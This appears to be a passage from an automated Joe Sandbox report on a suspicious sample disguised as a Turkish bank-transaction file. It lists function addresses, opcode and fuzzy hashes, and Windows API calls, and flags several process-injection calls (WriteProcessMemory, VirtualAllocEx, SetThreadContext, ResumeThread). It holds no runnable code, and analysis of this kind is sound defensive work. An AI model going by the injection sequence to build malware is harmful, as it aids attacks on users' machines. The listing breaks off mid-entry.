Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5ea8f6ab6f91beeb17f766ea2c0dd54b0c8d6fc28b9f0cbbfb9b8fbb4d77e0d0
Instruction ID: 76136d7ac954bf280dcab4474e024fede75a12975c42023dbdb26565b2d920de
Opcode Fuzzy Hash: 5ea8f6ab6f91beeb17f766ea2c0dd54b0c8d6fc28b9f0cbbfb9b8fbb4d77e0d0
Instruction Fuzzy Hash: C141FFB0C00719CFDB24CFA9C884BDDBBB5BF89304F24816AD448AB256DB756946CF50

Function 00D444E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D459C9

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9f86eba387604ef74a8803e28748331f7406526818bbb6004e62a606e748764a
Instruction ID: 4ea97018c6dff50628535fa4df948cd68e2b2d7d338bf72e16ee5816a2d21181
Opcode Fuzzy Hash: 9f86eba387604ef74a8803e28748331f7406526818bbb6004e62a606e748764a
Instruction Fuzzy Hash: B541F270C0071DCFDB24CFA9C884B8EBBB5BF88704F20816AD408AB255DB716A45CFA0

Function 06F34BD0 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F34C68

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8110ac518d161cb38b874cb18ba8f4ed59339a2d081353f4181555b14c1f4239
Instruction ID: 010bea4c0caad59383e592ce5a2bf70c635f20ca333ccf072930817e899221d3
Opcode Fuzzy Hash: 8110ac518d161cb38b874cb18ba8f4ed59339a2d081353f4181555b14c1f4239
Instruction Fuzzy Hash: 7B2148729003599FDF10CFA9C981BDEBBF5FF88310F108429E918A7240D7789954CBA4

Function 06F34BD8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F34C68

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7c2f2e3b16ee09fc35e2d6ef7f9f2a52737e34dbcaa6d1796ad3a6c6bfd7c9d9
Instruction ID: 8fe440f8f2a3d1f0c06bd2794eecda28cea7a8f85e19f66d02a4a93171020caf
Opcode Fuzzy Hash: 7c2f2e3b16ee09fc35e2d6ef7f9f2a52737e34dbcaa6d1796ad3a6c6bfd7c9d9
Instruction Fuzzy Hash: A12126B29003599FDF10CFAAC985BDEBBF5FF48310F10842AE918A7240D7789954CBA4

Function 06F34A38 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F34ABE

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: fd7b919e46eb1091c5fe9a7972d430f39056db3c7189fb8935dbe21e599462ea
Instruction ID: 0b74567a04ecef8b7e82e3077088f9ce6313474cc3bd9ba40d4ab500ea9592be
Opcode Fuzzy Hash: fd7b919e46eb1091c5fe9a7972d430f39056db3c7189fb8935dbe21e599462ea
Instruction Fuzzy Hash: 89213A71D003099FDB50CFAAC4857EEBBF4EF88314F14842AD559A7240DB789944CFA5

Function 06F350C0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F35148

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d4473de0d2283038b021824a0b73d8011941c286e4de843c44d8a273dd4fcc43
Instruction ID: 6fe467a18c99802d4bebb58ba2d0992eaf9e9408275790f8b6f0c38c64254d84
Opcode Fuzzy Hash: d4473de0d2283038b021824a0b73d8011941c286e4de843c44d8a273dd4fcc43
Instruction Fuzzy Hash: 862125B1D0035A9FDF10DFA9C981BEEBBF5BF48310F10882AE518A7240D7789510CBA1

Function 06F34A40 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F34ABE

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: fb41e44fe1fc472b1ff3129ff1d998a6b657cbbfa4a1ba0ac0eed238c12d417f
Instruction ID: cd2b78659ff7711181a7822c1f328927653c2e55a554c1b87c0182535e9a068e
Opcode Fuzzy Hash: fb41e44fe1fc472b1ff3129ff1d998a6b657cbbfa4a1ba0ac0eed238c12d417f
Instruction Fuzzy Hash: 26212771D003099FDB50DFAAC4857EEBBF4EF88324F14842AD519A7240DB78A944CFA5

Function 06F350C8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F35148

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f88e66c40996fea351a55dd0cee1a825abe77c4198ad6f7a4555a7b6d9bfd88b
Instruction ID: 73cc70611ae2ab78505c08c3b521badb7624051f062f4d8ccb113f824725360b
Opcode Fuzzy Hash: f88e66c40996fea351a55dd0cee1a825abe77c4198ad6f7a4555a7b6d9bfd88b
Instruction Fuzzy Hash: BA21E6B1D003599FDB10DFAAC881ADEBBF5FF88320F10842AE519A7250D7799550CBA5

Function 00D4D740 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D4D7C7

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9fb1f0ea010994745550b4238a60d09fca66bd91d6ce58db340ef6a11ebad4b1
Instruction ID: 1e523555d390a2f49464481f6b4d66f61e9ea8625d80bd4aad15e33612f8e1be
Opcode Fuzzy Hash: 9fb1f0ea010994745550b4238a60d09fca66bd91d6ce58db340ef6a11ebad4b1
Instruction Fuzzy Hash: 6621C4B5900249EFDB10CF9AD984ADEBBF9FB48720F14841AE914A3350D374A954CF65

Function 00D4D738 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D4D7C7

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bfd9590efabdfd322a11d4b569412e0bff4dad48f0e279fa4b525a0d54fcf644
Instruction ID: 4429b435e84e326246ad77f3dad0ecb8082870c7244a5c070416e9bc6b9d80f8
Opcode Fuzzy Hash: bfd9590efabdfd322a11d4b569412e0bff4dad48f0e279fa4b525a0d54fcf644
Instruction Fuzzy Hash: 2921E4B5900249DFDB10CFAAD984AEEBFF5FB48314F14841AE955A3310D374AA54CF60

Function 06F34B10 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F34B86

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 53b1b508e35cbebe4623e4e47eb30a1bf5c6de31edb9de61bd89e901f88acb88
Instruction ID: 7d339ce525f5b10e96e2c045524f89a90699e0bb62a8356f1019a7318e1b2f43
Opcode Fuzzy Hash: 53b1b508e35cbebe4623e4e47eb30a1bf5c6de31edb9de61bd89e901f88acb88
Instruction Fuzzy Hash: 95114472900249DFDB10DFAAC845BDEBBF5AF88720F248819E519A7250CB75A950CBA0

Function 06F34B18 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F34B86

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 101bbdc24a4d90df9da62fb79a12518ec08897b2e7f18b303f6c195b19c61000
Instruction ID: ba376838bbeffc3535f8a0cb2537e3b4a74f81a50bd140ab985de26cfe4c91a2
Opcode Fuzzy Hash: 101bbdc24a4d90df9da62fb79a12518ec08897b2e7f18b303f6c195b19c61000
Instruction Fuzzy Hash: 6E112672900349DFDF10DFAAC845BDEBBF5AF88720F248419E519A7250C775A950CBA1

Function 06F34988 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F349F2

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: aec6bb5898ae352dee90cf39689e13ef571f18dc746d6ad036095b3d83b123a5
Instruction ID: 16e1b1113c61955ef5411dba4f0d2212c277d693ce04609f8936a6cc1f15a5f1
Opcode Fuzzy Hash: aec6bb5898ae352dee90cf39689e13ef571f18dc746d6ad036095b3d83b123a5
Instruction Fuzzy Hash: 1E115871D003498FDB10DFAAC8457DEFBF4AF88724F248419D519A7240CB75A944CBA4

Function 06F34990 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F349F2

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a36ca8affc52448d53f4184eccfc817bce85cfcfb25c6de59f20bc27ce4a5198
Instruction ID: 3021538f234d7d510ec35007b316cf8691966d5763b8741c6d08c80a0c0b2537
Opcode Fuzzy Hash: a36ca8affc52448d53f4184eccfc817bce85cfcfb25c6de59f20bc27ce4a5198
Instruction Fuzzy Hash: FB113A71D00349CFDB10DFAAC44579EFBF4AF88724F248419D519A7240DB75A540CB95

Function 06F34DE4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06F39AF5

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2b6f303223eee07e4638c2f14e1896a2f3542087bf484ecb7faa276f24a5e077
Instruction ID: f8f2dbdd8dad982adf10aa69618c7a31dea36471e1c36441a70e0b2b93091b85
Opcode Fuzzy Hash: 2b6f303223eee07e4638c2f14e1896a2f3542087bf484ecb7faa276f24a5e077
Instruction Fuzzy Hash: E811F2B5800359DFDB50CF9AC884BDEBBF8FB48724F20841AE558A7200D3B5A944CFA1

Function 00D4B058 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D4B0BE

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 631cc3382f2a6da3092f8240e5a7d01c831d7779c84e9f3ee21c01e29117ede9
Instruction ID: 0f2d692c1b15698fb5c154c3cbc26b26bf0ff48c7b4e18cf3dcd5d09a2ec9cff
Opcode Fuzzy Hash: 631cc3382f2a6da3092f8240e5a7d01c831d7779c84e9f3ee21c01e29117ede9
Instruction Fuzzy Hash: C3110FB6C002498FDB10CF9AC444B9EFBF8AF88324F14841AD428A7200D3B9A545CFA1

Function 06F39A90 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06F39AF5

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 184ff66fa0c742e4310274f3bab6da5eb69e5b0cd430096b698a2e76fa015e66
Instruction ID: f7762247a646f8fb722def13785da0cb5b83901d316d67af023cab81254784e9
Opcode Fuzzy Hash: 184ff66fa0c742e4310274f3bab6da5eb69e5b0cd430096b698a2e76fa015e66
Instruction Fuzzy Hash: F31103B6C00359DFDB10CF99C985BDEBBF8EB48324F20840AE558A7200D3B5A544CFA5

Function 00C5D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2378677882.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c5d000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d34385527f53f5950805c822fd801ba43e89cd670da6d847345d6b65c1471120
Instruction ID: 24fba34707f79d008822c4f48c1b4faaae46d9d2059662fec7acc86523f590d1
Opcode Fuzzy Hash: d34385527f53f5950805c822fd801ba43e89cd670da6d847345d6b65c1471120
Instruction Fuzzy Hash: 282148BA500340DFCB25DF14D9C0B26BF61FB84319F60C169ED0A0B256C336D89ACBA1

Function 00C6D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2378739852.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c6d000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad475e2934fda30d7e8720365014aa99d09054afdc1b4237d4643d6ee52c9392
Instruction ID: 4ca61b3546968441eee243be0ae094d01b9bdf45bf4664321255defc7337b936
Opcode Fuzzy Hash: ad475e2934fda30d7e8720365014aa99d09054afdc1b4237d4643d6ee52c9392
Instruction Fuzzy Hash: 302146B1A04300EFDB24DF10D9D0B26BBA1FB88314F24C5ADE90B4B292C376DC46CA61

Function 00C6D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2378739852.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c6d000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70f2684351051fc0bfaa8e036c77499719f20e6465d38755ac9ff547b704288
Instruction ID: 4b64fe15ea313b044125eca444e19a297a20c8aa217a5c9b72549423a37db9cb
Opcode Fuzzy Hash: c70f2684351051fc0bfaa8e036c77499719f20e6465d38755ac9ff547b704288
Instruction Fuzzy Hash: AA212275A04340EFCB24DF14D9C0B26BBA5FB88314F20C56DE90A0B292C37BD807CAA1

Function 00C6D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2378739852.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c6d000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7228327ac07b647754441ebac1b404cb48684072976f10e5542a13ec131c3ce
Instruction ID: d277a083b1cb8674f936600f9aca457d2e67c11e7007c83c5c42c64c5e23da2c
Opcode Fuzzy Hash: f7228327ac07b647754441ebac1b404cb48684072976f10e5542a13ec131c3ce
Instruction Fuzzy Hash: 19215E755093C08FCB12CF24D9D4B15BF71EB46314F28C5EAD8498B6A7C33A990ACB62

Function 00C5D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2378677882.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c5d000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 5a7cf3e3e412b46d3e23147c749501baa05aa47c01e1b754808849a74bb0fe52
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: DC11AFB6504284CFCB15CF10D5C4B16BF71FB94318F24C6A9DC4A0B656C33AD99ACBA1

Function 00C6D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2378739852.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c6d000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: beae470514c2c18da16435e96cdff22fe83a2740516e009b196614cabd45a156
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 38119DB5A04284DFCB25CF10D5D4B15FBB1FB84314F28C6ADD84A4B6A6C33AD94ACB61

Function 00C5D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2378677882.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c5d000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66eb9398019f691e18fd4b1b88696da350f2da08acdde000095eab923aa4e62d
Instruction ID: d7b9aff0ea388b2b42fb372d85e5dbdd2a51be9ba8b557f9cf4fd393c78f27fe
Opcode Fuzzy Hash: 66eb9398019f691e18fd4b1b88696da350f2da08acdde000095eab923aa4e62d
Instruction Fuzzy Hash: 3A017B750043409AF7304F26CD84B26FF98DF493A1F18C45AED1A4A28AD6789888C6B5

Function 00C5D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2378677882.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c5d000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f56e275693469a28c57415f059bef0d5627279e4b4b164cddb557e4fd08e866
Instruction ID: 3103bb1458276a39da3a4e700427d9a300a576da59caaeacf1ee2948f8d5be75
Opcode Fuzzy Hash: 6f56e275693469a28c57415f059bef0d5627279e4b4b164cddb557e4fd08e866
Instruction Fuzzy Hash: EFF0C2764043449AF7208E15CD84B62FF98EB85775F18C05AED094A286D2799D84CBB1

Non-executed Functions

Function 06F3AC28 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 673d8b770ec1b490120d34052303f6b24efa553627f6ec4d078f522f0bf6aab5
Instruction ID: 01c021a58b3e267cd0698c5ef200eb69f781bc789faab90cfcd81639625bd12b
Opcode Fuzzy Hash: 673d8b770ec1b490120d34052303f6b24efa553627f6ec4d078f522f0bf6aab5
Instruction Fuzzy Hash: E3D1AB71B013148FEB95DB7AC8607AEB7F6EF89300F148469D19A9B291DB35D802CB61

Function 06F324F0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e4724ffb35f79ec31402b1d1389f6432215175a14c11d39f57302c3b687976
Instruction ID: ac774f3e5902ce14b4fabb4d3a5a9a76db99c6c7eb8dfb07f98ab78dbef2d6ba
Opcode Fuzzy Hash: 49e4724ffb35f79ec31402b1d1389f6432215175a14c11d39f57302c3b687976
Instruction Fuzzy Hash: 2FE1FC74E002698FDB54DFA9C590AAEFBF2FF49304F248269D414A7355D731AA42CF60

Function 06F32D60 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca8eb17e4afdb566b197d54b5879fd58e88fa3026a62b5ce83af80743ea7058
Instruction ID: f1a7f8010b0a11c06e44adb72c80f3fac15bc1c0860e9a4e7dc6711e1ea17270
Opcode Fuzzy Hash: bca8eb17e4afdb566b197d54b5879fd58e88fa3026a62b5ce83af80743ea7058
Instruction Fuzzy Hash: 92E1FB74E002698FDB14DFA9C581AAEFBF2FF49304F248269D414AB355D771A982CF60

Function 06F35260 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d8cf38f6c873c2202b234a33aa631e96fbd9e0afbac6a7e63fbe635e22f45b7
Instruction ID: 051b9e415fc0990e9565318eff05fb0a2cb3f0ad45d13712ef7e9194b9b7d5dc
Opcode Fuzzy Hash: 8d8cf38f6c873c2202b234a33aa631e96fbd9e0afbac6a7e63fbe635e22f45b7
Instruction Fuzzy Hash: 1EE1F974E002698FDB54DFA9C590AAEFBF2FF89304F248269D414AB355D731A942CF60

Function 06F34168 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d98196faeba13d642521a88d97cbc6080f6fa55721d4b6c6fbe0c3cc01b10ad
Instruction ID: d857ff3cf867e503efa4a7d5b60ee04967fe93d444d8a1c4eb82ad9db3346146
Opcode Fuzzy Hash: 8d98196faeba13d642521a88d97cbc6080f6fa55721d4b6c6fbe0c3cc01b10ad
Instruction Fuzzy Hash: B0E10C74E002698FDB54DFA9C581AAEFBF2FF89304F248269D414A7355D731A942CFA0

Function 06F32928 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105720b1f1c8379851668d9962dbb18bcd6ff63a9db08dcf1c7973e16176ab9d
Instruction ID: 9f19d5dbe8d54e7e935869fb2e4da7c91f36b3d7a5066584a5f17801a74a06d4
Opcode Fuzzy Hash: 105720b1f1c8379851668d9962dbb18bcd6ff63a9db08dcf1c7973e16176ab9d
Instruction Fuzzy Hash: 22E10C74E002698FDB14DFA9C590AAEFBF2FF49304F248269D414AB355D731A942CFA0

Function 00D4D424 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73fd352be209feec2c2880cdb1cb09dbcdaa640be2626d4bb83417c4b829fc21
Instruction ID: 3b356744c42c2f7792eb6e01f91090d46245f606ccd442a85068e83322b2a5b6
Opcode Fuzzy Hash: 73fd352be209feec2c2880cdb1cb09dbcdaa640be2626d4bb83417c4b829fc21
Instruction Fuzzy Hash: EFA14C32A00315CFCF05DFA5C88059EB7B2FF85300B15857AE805AB265DB71E956CB60

Function 06F34158 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117d243d4590abd90e050ba241f882d4793a7291b47d62f9d14f1f5d149a4552
Instruction ID: 8b8bfca89570aacde3e851dbf7d972354dfa3391304de6fd07e2e9ad660fcfdf
Opcode Fuzzy Hash: 117d243d4590abd90e050ba241f882d4793a7291b47d62f9d14f1f5d149a4552
Instruction Fuzzy Hash: 9751FA74E002698FDB14DFA9C981AAEFBF2FF89304F248169D418A7355D7319942CFA1

Function 06F32919 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
